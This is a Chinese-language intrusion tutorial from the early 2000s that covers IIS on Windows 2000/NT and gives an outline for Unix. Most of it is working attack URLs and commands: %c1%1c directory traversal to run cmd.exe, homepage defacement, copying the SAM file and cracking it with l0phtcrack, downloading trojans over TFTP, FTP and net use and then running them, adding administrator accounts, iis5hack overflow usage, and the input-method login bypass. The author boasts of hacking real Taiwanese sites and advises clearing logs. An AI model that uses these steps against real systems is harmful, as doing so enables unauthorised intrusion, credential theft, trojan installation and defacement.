例如 (Windows 2000 + IIS 5.0 + SP1 简体中文版):
http://192.168.8.48/A.ida/%c1%00.ida
IIS 将返回"@.ida" 找不到该文件 在这里 （0xc1-0xc0)*0x40+0x00=0x40=’@’
http://192.168.8.48/A.ida/%c1%01.ida
IIS 将返回 "A.ida" 找不到该文件 这里 （0xc1-0xc0)*0x40+0x01=0x41=’A’
http://192.168.8.48/A.ida/%c1%02.ida
IIS 将返回 "B.ida" 找不到该文件 ....
http://192.168.8.48/A.ida/%c0%21.ida
IIS 将返回 "!.ida" 找不到该文件
这就意味着你能利用这些编码的特点。
例如：
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ’/’
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ’\’
所以我们就可以用这种方法进入一些目录。
(1http://192.168.8.48/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
这样我们将得到
Directory of d:\inetpub\scripts
2000-09-28 15:49 〈DIR〉
. 　　1999-07-21 17:49 147,456
Count.exe 2000-09-12 17:08 438,290
Count25.exe 2000-10-13 15:03 8,867
counter.err 2000-08-23 23:07 160,002
counter.exe 1999-05-25 18:14 3,925
CountNT.html 1999-07-21 17:49 64,512
extdgts.exe 2000-08-10 15:24 46,352
ism.dll 1999-07-21 17:49 64,512
mkstrip.exe 1999-05-25 18:18 1,317
README.txt 2000-09-28 15:49
〈DIR〉 wcount 9 File(s) 935,233 bytes
(2) 我们也可以利用此BUG得到一些系统文件的内容
http://192.168.8.48/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
IIS 将把它当作 a .ASP 文件提交.它将让 asp.dll 来打开文件win.ini
如果用 IIS 4.0+SP6(中文版), 将不能测试成功 但是我们能用下列方法得到。http://192.168.8.100/default.asp/a.exe/..Á../..Á../winnt/winnt.ini
"default.asp" 是一个存在的 .ASP 文件， "a.exe" 是一个随机的 .EXE 文件名. 它可以不存在。
打上SP1仍然还有这种编码问题。
在英文版本中使用 %c1%af 能正常利用这个漏洞。
2.了解了漏洞的详细资料。让我们来说说怎么利用。
a.利用IISExploitSearcher工作之便这个软件，我们来找有这个漏洞的主机。
虽然这个漏洞公布很久了， 但你仍然会发现，你可以找到很多这种机器。
假如我们已经找到了一台有这个漏洞的机器。
让我们来进行下面的操作。
b.http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe
这个URL语句的执行的命令是：利用NT/2000下的命令解释程序cmd.exe来执行一个拷贝命令。
copy c:\winnt\system32\cmd.exe ccc.exe
它把c:\winnt\system32\cmd.exe 拷贝到了c:\inetpub\scripts\ccc.exe
就是DOS命令中的空格，在URL中就要换成“+”号。
你要执行copy c:\winnt\system32\cmd.exe ccc.exe
相对应的是http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe
其中/scripts/..%c1%1c../winnt/system32/cmd.exe?/c是固定的，他的作用是调用c:\winnt\system32\cmd.exe来执行命令。
噢，忘了说为什么要拷贝cmd.exe了。
因为微软的iis加载程序的时候检测到有串cmd.exe的话就要检测特殊字符“&|(,;%<>”，所以必须改名。
c.这时c:\winnt\system32\cmd.exe已经拷贝到了c:\inetpub\scripts\ccc.exe
通http://ip/scripts/ccc.exe?/c
我们就可以调用到cmd.exe了，就是说不用那个编码了。
http://ip/scripts/ccc.exe?/c+echo+Hacked+by+Lion+>+c:\inetpub\wwwroot\default.asp
http://192.168.8.48/scripts/ccc.exe?/c+echo+20/10/2000+>>+c:\inetpub\wwwroot\default.asp
主页面就被修改成了：
Hacked by Lion
20/10/2000
也就是说，已经把他的主页黑了。
：P
下面是一些解释。
其中echo 是一个回显命令。
你在DOS下打一个echo Hacked by Lion 看看。
它是在屏幕上显示
Hacked by Lion
不只这样
你也可以让它把东西写进一个文件。
echo Hacked by Lion > lion.txt
这样当前目录下的lion.txt文件里就有了Hacked by Lion的字样。
其中 > lion.txt的用途是把回显的字符写进lion.txt,它覆盖原来的内容。
你如果再想用echo 20/10/2000 > lion.txt 来写剩下的内容的话，
你会发现它覆盖了原来的内容Hacked by Lion。
怎么办呢？别急！
echo Hacked by Lion > lion.txt
echo 20/10/2000 >> lion.txt
看看吧
文件里面的是
Hacked by Lion
20/10/2000
成功了。
这样，就可以用上面的解释，把空格用"+"代替，就可以向别人的主页写任何东西了。
补充一点
好多站点\inetpub\下的scripts目录删除了， 但\Program Files\Common Files\System\下 的msadc还在
（有msadcs.dll漏洞的话就不用 %c1%1c了）。
这时可以如下构造请求：
http://ip/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:就能调用到cmd.exe
3.当然，我们也不能只停留在黑主页的地步，当然想进一步控制整个机器了。
：P

下面来说说几种方法来控制这个机器。
a. 如果c:\winnt\repair\sam._存在
那么我们把copy c:\winnt\repair\sam._ c:\inetpub\wwwroot然后用浏览器下载，用破NT密码的工具，比如l0phtcrack来破。
b.上载文件
1.找一个ftp服务器，将须上载的文件copy 到ftp服务器上，
假设这个 ftp server的 ip:127.1.1.1 ,username:abc,password:bbb 文件名：srv.exe
2.编辑一个上载执行文件
http://ip/scripts/ccc.exe?/c+echo+open+home4u.china.com>+up.txt
http://ip/scripts/ccc.exe?/c+echo+pppppppppp>>+up.txt (>>号前不要有空格）
http://ip/scripts/ccc.exe?/c+echo+pppppppppp>>+up.txt
http://ip/scripts/ccc.exe?/c+echo+getsrv.exe>>+up.txt
http://ip/scripts/ccc.exe?/c+echo+quit>>+up.txt
http://ip/scripts/ccc.exe?/c+tp+-s:up.txt
如果你看不懂上面的命令。
你在DOS下打一个ftp /?看看。
：P

成功率很高的哦。
3.然后http://ip/scripts/srv.exe运行它。
srv.exe是我放的一个冰河服务端。

下面不用我说了吧。
用冰河客户端连接他就可以了。
：P
顺便说一下
冰河的公用密码是：
05181977
他有70%左右的成功率。
subseven的共用密码是：
abuse
4.当然你也可以给他中一个nc99.exe等的东西。
获取administrator权限
上载getadmin.exe
getadmin iusr_机器名
这一招不一定有效哦。
http:/ip/scripts/ccc.exe?/c+net+user+aaa+12345+/add
http:/ip/scripts/ccc.exe?/c+net+localgroup+administrators+aaa+/add
c. 当然我们也有其他方法来上传文件。
前一段时间黑了几个台湾网站，net use也练得比较熟了。
看到有一个类似的教程用net use。
我也试了一下，累试不爽。呵呵
找个中转站，利用net use来上传文件。
我们要用到legion。
legion是一个扫描共享的软件。
你通过用它，你会找到一大堆的蠢伙。把整个C.D盘共享，并且不用密码的。
当然，设置密码也是没用的。呵呵猜26个字母就搞掂了。当然这要用另外一个软件。：P，在这就不说了。
找到后C盘或D盘后，
net use g: \\x.x.x.x\d
把他的d映射成你的g:盘。
现在我们来把东西拷贝到他的D盘，也就是你的G盘。
copy e:\tools\srv.exe o:拷贝一个文件，随便你哦。：P
你也可以在我的电脑里把它拖过去就可以了。：P
操作完成就不管他了。
让我们来回到服务器上操作。
1http://x.x.x.x/scripts/ccc.exe?/c+net+use+g:+\\10.1.1.1\d
建立连接和映射。
这个过程时间可能会长一点，耐心等等。
http://x.x.x.x/scripts/ccc.exe?/c+dir+g:
看看东西在不在哦：P
3http://x.x.x.x/scripts/ccc.exe?/c+g:\srv.exe
直接运行就可以了。
：P
又一个中了木马。
但我不能保证它能100%成功哦。
d.用TFTP上传文件。
但具体怎么用我没试过。：（
谁知道的写信告诉我。

近来安全类技术网站提得最多的技术漏洞莫过于 %c1%1c 的问题。
%c1%1c，中文简体里面没有这种字，照正常的情况根据内码转换文件
\winnt\system32\c_936.nls会编码成“？”。但对中文简体版IIS中
c1 1c解码成了（c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路
径串中的“..\”之后，所以可以突破IIS路径访问到上级目录。此漏洞
从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0
+SP1，好像台湾繁体中文也受此漏洞影响。
执行http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32
/cmd.exe?/c+dir%20c:\发现列出了远程主机C:\下的所有文件，执行：http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd.exe?/c
+copy%20c:\autoexec.bat%20c:\autoexec.bak 成功实现文件的复制，
执行http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+del%20c:\autoexec.bak 成功实现文件的删除，哇！太利害了。
随便浏览了一下，因为是国内的主机，不想搞破坏，只想练练手！目的：
获得Administrator权限。
执行http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot把sam._文件拷贝到wwwroot文件内，输入http://xxx.xxx.xxx.xxx/sam._
将sam._文件下载到本地，执行：http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd.exe?/c
+del%20c:\inetpub\wwwroot\sam._清除痕迹。
在本机执行：C:>expand sam._ sam
启动l0phtcrack 2.5(可http://rina.yofor.com/7index.html下载)，Import Sam File... 导入sam文件，Open Wordlist File...
打开一个字典，Run Crack，乖乖，要17个小时，不管它，让它慢慢破去，先睡个
觉先！五分钟后来一看，Administrator 的 Nt Password 居然是 123456，我昏，
网管们注意了，这种密码也可以取呀？执行：C:\>newletmein \\xxx.xxx.xxx -admin
扫描主机，发现管理员ID是：asdfghjk,执行：C:\>net use \\xxx.xxx.xxx.xxxc$
123456 /user:asdfghjk 成功联上对方主机，大功告成！

文中提及的FTP上传现在不太用了，都改用TFTP上传。我简要说一下TFTP的使用方法：

首先使自己的系统配置成为TFTP服务器。这个很好办，下载一个TFTP服务器在本机运行起来。然后在存在U漏洞的目标主机浏览器里输入：

http://192.168.4.95/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp20%-i20%192.168.4.9120%get20%srv.exe20%c:\\winnt\\system32\\srv.exe

这里的srv.exe是你想要放的木马程序。注意：要上传的文件必须和TFTP服务器在同一目录下。192.168.4.95是对方IP，192.168.4.91是自己IP。然后通过浏览器来执行这个木马：

http://192.168.4.95/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+srv.exe

回车后木马就在远程主机上运行了。以后能做什么事就取决于该木马的功能。

当然，也可以通过TFTP来下载，譬如说我想把它的c:\winnt\repair\SAM._文件down下来，就在浏览器里这样输入：

http://192.168.4.95/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20192.168.4.95%20put%20c:\winnt\repair\sam

这样SAM文件就被下载到本地TFTP的同一个目录里。

当然也可以先把目标主机的SAM文件复制到c:\inetpub\wwwroot\，然后通过浏览器来下载。这样做：

http://192.168.4.95/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\repair\sam+c:\Inetpub\wwwroot\

这样就把c:\winnt\repair\里的sam文件拷贝到c:\Inetpub\wwwroot\下，利用浏览器把它下载来。在地址栏里输入：

http://192.168.4.95/sam

回车后SAM文件就被下载到本地了。

然后用10phtcrack这样的工具进行破解。10phtcrack是大名鼎鼎的破NT密码的工具，成功率很高，一般的密码被破解出来只是时间长短的问题。得到管理员密码后，就可以参考前一种方法进一步入侵系统了。

3、利用开放终端服务和输入法漏洞入侵：

这种入侵方法也是前一阵网上提得最多的，特点是简单有效，只要发现漏洞，就能成功入侵。其实它不牵涉到口令问题，并不需要对口令进行破解。只是通过系统的漏洞绕过身份验证，然后登陆上去在远程主机添加管理员用户。用到工具：

redmay3389：红色五月的3389端口扫描器，用来扫描网络上开放了终端服务的主机。

微软终端服务客户端：用来和开放了终端服务的服务器连接。

入侵过程：打开redmay3389，输入一段IP地址，开始扫描远程主机的3389端口。稍等一会，找到了几台开了3389端口的主机。随便找一个来测试，打开客户服务端软件，输入IP后尝试连接，几秒钟的时间便连接上对方主机，在客户服务端软件里出现了对方主机的登陆窗口。到现在为止就要看对方的主机有没有输入法漏洞了，如果没有，那就只好打道回府。把鼠标放到用户名框里点击一下，然后按ctrl+shift,把输入法转换到全拼状态，然后把鼠标放到状态条的图标上，按右键弹出一个选项，里面有个选项是帮助，把鼠标放到帮助上，在新弹出的选项里选择“输入法入门”，然后就会弹出一个叫“输入法操作指南”的大的窗口，这个窗口里有个栏目是“选项”，把鼠标放在这个选项上面点击右键，在新弹出的小窗口里选择“跳至url”，然后就会弹出一个窗口，在里面输入盘符和路径就会在“输入法操作指南”窗口的右边显示出来该路径下的内容。现在有两种方法可以攻击：
    1.把c:\winnt\system32\cmd.exe程序改名拷贝到c:\inetpub\scripts\目录下，然后在浏览器里来实现攻击，具体方法参看前面的Unicode漏洞入侵。
    2.在“跳至url”里的框里输入：c:\winnt\systm32\，这样c:\winnt\system32\下的内容就全在右边窗口显示出来。在显示出来的文件里找到net.exe这个文件，右键后点击“创建快捷方式”，之后系统会自动创建一个“快捷方式 net.exe”的文件，把鼠标放到这个文件上面点右键，选择“属性”，就会弹出一个“快捷方式 net.exe属性”的窗口，这个窗口的“目标”的框里默认的是：c:\winnt\system32\net.exe 在这个命令的后面加上user pyh 1234 /add ，确认后把这个“快捷方式 net.exe”文件点击运行，这样就在远程主机上新建了一个用户：user:pyh;passwd:1234.但是权限只是普通用户的，我们现在把这个用户提升到管理员权限，还是在那个“快捷方式 net.exe属性”窗口的c:\winnt\system32\net.exe后面加上：localgroup administrators pyh /add ，确定后点击运行，这样就把该用户权限提升到系统管理员了。到此为止，我们已成功入侵目标。下一步怎么做不多说，参看前面流光IPC$入侵。

4、IIS5远程缓冲区溢出攻击：

这里是绿盟的安全公告：

—————————————————————————————————————

微软Win 2K IIS 5.0 远程缓冲区溢出

日期：2001-5-6  

受影响的系统:
Microsoft Windows 2000 Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server

描述:
BUGTRAQ ID: 2674
微软Win 2K IIS 5的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系，缺省情况下该映射存在。当远程用户提交对.printer的URL请求时，IIS 5调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏足够的缓冲区边界检查，远程用户可以提交一个精心构造的针对.printer的URL请求，其"Host:"域包含大约420字节的数
据，此时在msw3prt.dll中发生典型的缓冲区溢出，潜在允许执行任意代码。溢出发生后，WEB服务停止响应，Win 2K可以检查到WEB服务停止响应，从而自动重启它，因此系统管理员很难意识到发生过攻击。

漏洞利用程序见“\漏洞利用\exploit\cgi\iis\iis5hack.zip”。
<* 来源：Riley Hassel of eEye Digital Security *>

———————————————————————————————————————

    安全焦点对这个漏洞也给出了测试程序，详情请察看我前面写过的《IDTHS测试报告》。

对IIS的缓冲区溢出需要用到sunx写的一个小工具：iis5hack.exe，这是一个在DOS下运用的命令行工具，我们将它拷贝到c:\winnt\system32\目录下。然后开DOS窗口，输入如下命令：

c:\>iis5hack 192.168.4.xx 80 1 0

其中80表示目标被攻击端口，第一位0表示操作系统类型为安装了SP1的中文win2000系统，第二位0表示想要在远程系统上打开的TELNET端口，这里表示端口为99。

对IIS5HACK的详细使用方法请参看作者主页www.sunx.org

过一会，出来提示句行，说明溢出成功，可以在99端口telnet进去了。

到这一步我就不多说了，详情请看前文。主要入侵步骤如下：

添加用户：net user wazzy 1234 /add

将用户加入管理组：net localgroup administrators wazzy /add

退出后再net use 连上去，上传木马，这样入侵就成功了。

然后微软的IIS还存在两个缓冲区溢出漏洞，这里是绿盟的安全公告：

——————————————————————————————————

微软Index Server(.ida/idq) ISAPI扩展远程溢出漏洞

日期：2001-6-18  

更新日期: 2001-6-21

受影响的系统:  

Microsoft Index Server 2.0

－ Microsoft Windows NT 4.0 IIS 4.0

Indexing Service in Windows 2000

－ Microsoft Windows 2000 IIS 5.0

描述:

BUGTRAQ ID ： 2880

CVE ID     :  CAN-2001-0500

微软IIS缺省安装情况下带了一个索引服务器(Index Server,在Windows 2000下名为"Index Service").缺省安装时，IIS支持两种脚本映射：管理脚本(.ida文件)、Inernet数据查询脚本(.idq文件)。这两种脚本都由一个ISAPI扩展 - idq.dll来处理和解释。

由于idq.dll在处理某些URL请求时存在一个未经检查的缓冲区，如果攻击者提供一个特殊格式的URL,就可能引发一个缓冲区溢出。通过精心构造发送数据，攻击者可以改变程序执行流程，执行任意代码。

成功地利用这个漏洞,攻击者可以远程获取"Local System"权限。

<*来源：Riley Hassell of eEye Digital Security

        相关链接http://www.eeye.com/html/Research/Advisories/AD20010618.html

*>

绿盟给出了相应的测试程序如下：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

提交下列URL请求：

GET /NULL.ida?[buffer]=X HTTP/1.1

Host: werd

如果[buffer]的长度超过240个字节，就可能触发溢出。

IIS的.idq/.ida映射的溢出漏洞已经公布了好久了，但由于利用这个漏洞有比较大的难度，所以可用的攻击程序一直也没写出来。因此，因特网中利用这个漏洞进行攻击的成功率并不高。在安全焦点里也有针对它的攻击测试程序源代码。

5、SQL弱口令入侵：这个其实没什么说的，前提是很多SQL用户粗心大意，默认 SQL的管理员帐号sa的密码为空。下面是我用流光对本地网络SQL密码的一段探测结果。（略图）

结果出来，有7个用户的SQL管理员密码为空！

随便在上面找一台，用流光的“MSSQL工具”连接上去，执行SQL远程命令。

点连接后就登陆进去了。然后就在远程主机上添加管理员用户，取得系统的控制权。

      WIN2000/NT的口令入侵就讲到这里，下面介绍UNIX系统的口令入侵方法。
    

二、UNIX系统口令入侵

我在前面提过了UNIX入侵的思路：1、扫描远程系统，试图发现漏洞，如rpc漏洞、FTP匿名登陆等。2、finger远程系统，尝试获得其用户列表。3、根据已获得资料试图得到远程系统的一个shell。这一步很重要，黑客的技术水平如何就体现在这里了，一些高明的黑客利用极其简单的一个系统弱点就能得到一个自己想要的shell。4、得到shell后，黑客就可以远程rsh或rlogin过去了，然后查看系统版本信息，根据已有的经验判断该版本系统可能存在的缓冲区溢出漏洞。5、查找系统可写入目录，并判断自己是否有可编译权限。6、当这一切完成后，黑客就上传一个溢出程序，在远程主机上编译并执行，从而利用溢出漏洞得到root权限。7、留下后门，清除日志。

    从以上过程看，UNIX系统的入侵与口令破解的关系并不大，一般情况不大可能象流光入侵NT那样对远程系统的root密码进行穷举探测，这是因为通常主机都不允许远程用户用root登陆，而且在密码试探几次仍不正确后远程主机就会中断这个登陆请求。现在利用John之类的工具来破解passwd档也不是流行的事，因为一是passwd档都是shadow过的，普通用户无法拿到shadow文档，二是用john穷举破解可能需要无穷多的时间。那么入侵这类系统的关键就是找到远程系统的溢出漏洞，然后上传程序编译执行，使其溢出，得到root权限。在UNIX的各种版本中，不管是SunOS、FreeBSD还是IRIX，HPUnix、Linux等，都存在着不同形式的溢出漏洞。如wu-ftp 2.60存在远程溢出，利用这个远程溢出只要有一个匿名 FTP 账号就可远程获得管理员权限，当然前提是需要一个可写目录。
    

由此可见，对UNIX系统的远程侵入有两个关键：第一是获得一个有写入权限的shell；第二是发现远程系统上存在的溢出漏洞，尝试执行程序使其溢出。通常第一个步骤要困难些，不是每个人都能利用有限的系统弱点获得shell的。至于第二步，就不是很困难了，发现系统版本后，根据经验判断该版本系统可能存在的漏洞，然后上传程序，执行溢出，把自己的权限提升到root。具体的入侵案例网上有很多现成的，我不在这里赘述